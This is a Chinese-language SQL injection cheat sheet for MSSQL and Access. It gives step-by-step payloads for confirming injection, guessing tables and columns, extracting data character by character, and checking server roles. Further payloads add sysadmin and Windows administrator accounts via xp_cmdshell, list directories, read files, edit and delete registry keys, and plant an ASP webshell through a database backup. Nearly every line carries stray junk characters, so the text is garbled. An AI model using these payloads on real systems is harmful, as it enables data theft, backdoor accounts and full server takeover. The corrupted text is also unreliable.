1.判断是否有注入;and 1=1 ;and 1=2 ?\y%]1
2.初步判断是否是mssql ;and user>0 g)1X&>
E ]f)Os$
3.注入参数是字符'and [查询条件] and ''=' D(\$i.,b2
Bm /YgQi
4.搜索时没过滤参数的'and [查询条件] and '%25'=' _ck[&Q
xaW{I7FfG
5.判断数据库系统 i=rH7k
uMd. j$$
;and (select count(*) from sysobjects)>0 mssql BJy;-(JP
pj8azFZ
;and (select count(*) from msysobjects)>0 access g7n"
?fK1
E!mmLVa9
v&;:^jJ8
6.猜数据库 ;and (select Count(*) from [数据库名])>0 k\aK?(.RC7
<]U1\~j
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 c^9tYNn
#ekM"p
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 {HrZ4xQnpV
d5!!Ut
9.(1)猜字段的ascii值(access) )(TAT<
G;1?<3
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 S
v`qB'e2
MbA\pG'T
(2)猜字段的ascii值(mssql) H"Dn]$Q\Z
PJ\0JR7a
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 {_>em*V b
{vVTv SC
10.测试权限结构(mssql) :]II-$/8
+ts0^;QO2{
<+tD z (
Adx`8}N8
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- {y-^~Q"z
(.23rVvnT@
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- @_yoX(.E&
Yj3I5RG
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- `JURQ:l)3^
>:
Wau
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Im?LIgt$
=RsXI&&vh
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 8dO?K*J,H'
0. ;}]v
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Q8nId<\(
o\=n4;S
;and 1=(select IS_MEMBER('db_owner'));-- HdX2YPYn;
8%:]W^
))T>jh
.\:J~(
11.添加mssql和系统的帐户 $xgBKD
2A:,;~UH
;exec master.dbo.sp_addlogin username;-- wCKj7y[
;exec master.dbo.sp_password null,username,password;-- uGVy6,
Da1aI]{I
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 4. qtp`
i$^ZTb^
;exec master.dbo.xp_cmdshell 'net user username password fiDl8=~@
V5mTu)tp5
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- (6gK4__}]
,kM)7!]N
;exec master.dbo.xp_cmdshell 'net user username password /add';-- /X*oS&-M
#x@ eDnb_
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- =Lp7{09u
27Emm
c
ccJM>9
[\e@_vY@OH
12.(1)遍历目录 &^.57]
n"D ?I
;create table dirs(paths varchar(100), id int) #"*e+.j[;
#JW+~FU`
;insert dirs exec master.dbo.xp_dirtree 'c:\' 9pSUIl9|j
3iX?~
;and (select top 1 paths from dirs)>0 |U'I/A
svhI3"r
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) j`>^1Q
Y%aWK~O
[iS$JG-
iCQ>@P]nE
(2)遍历目录 8|g<X1H{M
8y2+$
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- }IaA7f
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ]uh3R{a/
#f,y&\Xmf
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 \2v"YVWw
nv/[I,nw
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Gh(
A%x)
t?eH'*>
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
iThSt72
83Ou9E!W
zGo|JF
a2@c%i
13.mssql中的存储过程 WcUJhi^\C
!36]ud&
xp_regenumvalues 注册表根键, 子键 !cX[-}Q
YTaLjITG
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 V!/:53
z8_XX$Mnt
xp_regread 根键,子键,键值名 Ctu?o+^;z
~qP[eWe
;exec xp_regread SZU
\i*
nms8@[4-
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 :!TIK1
GZ #aj|
xp_regwrite 根键,子键, 值名, 值类型, 值 qSU|=
3lxc4@Zmd
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 L"+$Wc[|
[:EvTY
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ]ZoPQUS?
$)~
xp_regdeletevalue 根键,子键,值名 ef"?|sn
Dt}rR[yJ
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 _=XX~^I,
4@3[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 `)$_YZq|SR
VR?^HA9
s][24)99
@z`@f"l
14.mssql的backup创建webshell JK_OZ
))h6~1`
use model dFXc/VH')
W7No ls{
create table cmd(str image); }:Z9Vc ZP`
k ]a*&me
insert into cmd(str) values (''); 9)dfL?x8V{
$%k1fa C
backup database model to disk='c:\l.asp'; $4=f+ "z
RVw9Y*]b
clO,}Ph>
k+ o|0
15.mssql内置函数 7 A$B{
vb{i
;and (select @@version)>0 获得Windows的版本号 |bv,2uW z
,\)a_@@k
;and user_name()='dbo' 判断当前系统的连接用户是不是sa +>f<EPGn
Q9F)
;and (select user_name())>0 爆当前系统的连接用户 W&Y"K)`
VyLH"cCv
;and (select db_name())>0 得到当前连接的数据库 eDKxn8+(H
[#^#+ |{\
E>jh"|f:{
a}yXC<}$
16.简洁的webshell g=@_Z"
>pL2*O^{9
use model q>!L6h5]t
lEjwgk {
create table cmd(str image); ~l[ra
QP@<)`1t9
insert into cmd(str) values (''); iI1n2>V3y
/u<nLj 1
backup database model to disk='g:\wwwtest\l.asp';